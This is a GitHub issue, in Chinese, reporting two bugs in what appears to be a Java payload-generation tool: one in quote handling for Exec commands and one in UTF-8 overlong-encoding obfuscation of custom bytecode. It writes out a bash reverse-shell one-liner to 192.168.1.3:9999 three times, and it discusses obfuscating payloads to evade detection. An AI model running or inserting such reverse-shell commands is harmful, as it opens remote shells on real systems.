反馈两个bug

 最新docker镜像版本
1. `JavaNativePayload` -> `BytecodeConvert` -> `Exec`下命令填写遇到双引号、单引号生成字节码会出现问题
双引号情况：`bash -c "bash -i >& /dev/tcp/192.168.1.3/9999 0>&1"`
<img width="1223" alt="Image" src="https://github.com/user-attachments/assets/e226a30b-a48b-41fb-aab6-6ed3acab94b4" />
单引号情况：`bash -c 'bash -i >& /dev/tcp/192.168.1.3/9999 0>&1'`
<img width="1392" alt="Image" src="https://github.com/user-attachments/assets/b3fa4832-3b81-4402-9a4c-007a3041c9ce" />
试了下只有这种写法可以：`bash -c \"bash -i >& /dev/tcp/192.168.1.3/9999 0>&1\"`


2. Utf8OverlongEncoding提示支持在 UserCustomByteXXX 自定义字节流中进行混淆，发现自定义字节码流后仍未被Utf8OverlongEncoding混淆。
这里以自带的reverseshell生成的字节码为例，使用BytecodeFromBase64自定义字节码-Base64字符串

<img width="1237" alt="Image" src="https://github.com/user-attachments/assets/ceffff72-4af0-482b-b743-25fcf5738dca" />
开启纯2字节 utf8 overlong encoding混淆后base64解码生成的内容发现自定义字节码部分未被混淆

<img width="756" alt="Image" src="https://github.com/user-attachments/assets/620540bd-aee8-49cf-93fe-809325c2a5cb" />

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

反馈两个bug #15

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

反馈两个bug #15

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions